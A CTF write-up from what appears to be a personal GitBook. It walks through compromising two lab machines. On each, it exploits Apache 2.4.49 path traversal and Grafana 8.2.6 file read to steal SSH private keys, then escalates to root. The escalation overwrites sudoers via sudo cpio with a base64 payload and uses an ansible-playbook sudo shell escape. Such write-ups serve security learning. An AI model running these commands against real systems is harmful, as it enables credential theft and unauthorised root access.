Writeups
  • Writeups
  • CTF Writeups
    • ctfs
      • BRCTF
      • CloudSEK - BSides Cyber Security CTF 2023
      • CloudSEK - Nullcon Cyber Security CTF 2023
      • CyberHavoc CTF 2023
      • Cyber Heroines CTF
      • IWCON CTF 2023
      • SecurityBoat - October CTF 2023
      • The Hacker101 CTF
      • Wizer CTF Event 6 Hour Challenge
      • FooBar CTF 2023
      • Lag and Crash 3.0
      • NahamCon CTF 2022
        • Crash Override:
        • Exit Vim:
        • Flagcat:
        • Flaskmetal Alchemist:
        • Personnel:
        • Poller:
        • Prisoner:
        • Quirky:
        • Read The Rules:
        • Technical Support:
        • Wizard:
      • picoCTF
        • crypto
          • Easy Peasy
    • files
  • HTB
    • HTB Challenges
      • Baby Time Capsule
      • Lost Modulus
      • RLotto
      • Toxic | HTB Web Challenge
      • xorxorxor
    • HTB Machines
      • HTB Machine Precious
      • HTB Machine Stocker
  • Other Challenges
    • Academy Box - PEH Capstone TCM Security
    • Saptang Labs Hiring Challenge
Powered by GitBook
On this page
  • Target list
  • apache
  • grafana

Was this helpful?

  1. CTF Writeups
  2. ctfs

BRCTF

PreviousctfsNextCloudSEK - BSides Cyber Security CTF 2023

Last updated 1 year ago

Was this helpful?

https://bctf.africa/

In this CTF we are given target machines

Target list

apache

port 80 is open

from the response header we notice that it is running on Apache/2.4.49 version and by googling we know that it is

using the we can get the id_rsa file

bash apache_PoC.txt targets.txt /home/BRCTF/.ssh/id_rsa > id_rsa

now using this key file we can login to ssh

ssh BRCTF@10.0.13.0 -i .\id_rsa

to know the username BRCTF we read the /etc/passwd file using the same exploite

we are able to login and we can use cpio with sudo without password

we can use cpio to change the /etc/sudoers file so we can run any binary with sudo without password

we can use the following commands to read the current sudoers file

echo "/etc/sudoers" > namelist
sudo cpio -o < namelist > archive
cat archive

it will save the files in namelist to archive

now we have to add BRCTF ALL=NOPASSWD: ALL in sudoers file

echo "RGVmYXVsdHMgICBlbnZfcmVzZXQNCkRlZmF1bHRzICAgbWFpbF9iYWRwYXNzDQpEZWZhdWx0cyAgIHNlY3VyZV9wYXRoPSIvdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9zYmluOi91c3IvYmluOi9zYmluOi9iaW4iDQoNCiMgSG9zdCBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgVXNlciBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgQ21uZCBhbGlhcyBzcGVjaWZpY2F0aW9uDQoNCiMgVXNlciBwcml2aWxlZ2Ugc3BlY2lmaWNhdGlvbg0Kcm9vdCAgQUxMPShBTEw6QUxMKSBBTEwNCkJSQ1RGIEFMTD1OT1BBU1NXRDogQUxMDQoNCiMgQWxsb3cgbWVtYmVycyBvZiBncm91cCBzdWRvIHRvIGV4ZWN1dGUgYW55IGNvbW1hbmQNCiVzdWRvIEFMTD0oQUxMOkFMTCkgQUxMDQoNCiMgU2VlIHN1ZG9lcnMoNSkgZm9yIG1vcmUgaW5mb3JtYXRpb24gb24gIkBpbmNsdWRlIiBkaXJlY3RpdmVzOg0KDQpAaW5jbHVkZWRpciAvZXRjL3N1ZG9lcnMuZA==" | base64 -d > sudoers
echo sudoers > namelist
sudo cpio --no-preserve-owner -p /etc < namelist

this base64 content is our modified file and we save it in current directory --no-preserve-owner : Do not change the ownership of the files It will save our modified file in /etc folder overwriting the existing one and without changing the file ownership or it will create error

now we are root

grafana

port 3000 is open

we can now connect to ssh

ssh BRCTF@10.0.13.9 -i .\id_rsa.txt

we use https://gtfobins.github.io/gtfobins/ansible-playbook/#sudo payload to get root

TF=$(mktemp)
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
sudo ansible-playbook $TF

:octocat: Happy Hacking :octocat:

it running grafana v8.2.6 and it is to LFI just like privious challange we read the /home/BRCTF/.ssh/id_rsa file and connect to ssh

vulnerable
apache
grafana
vulnerable to LFI
exploite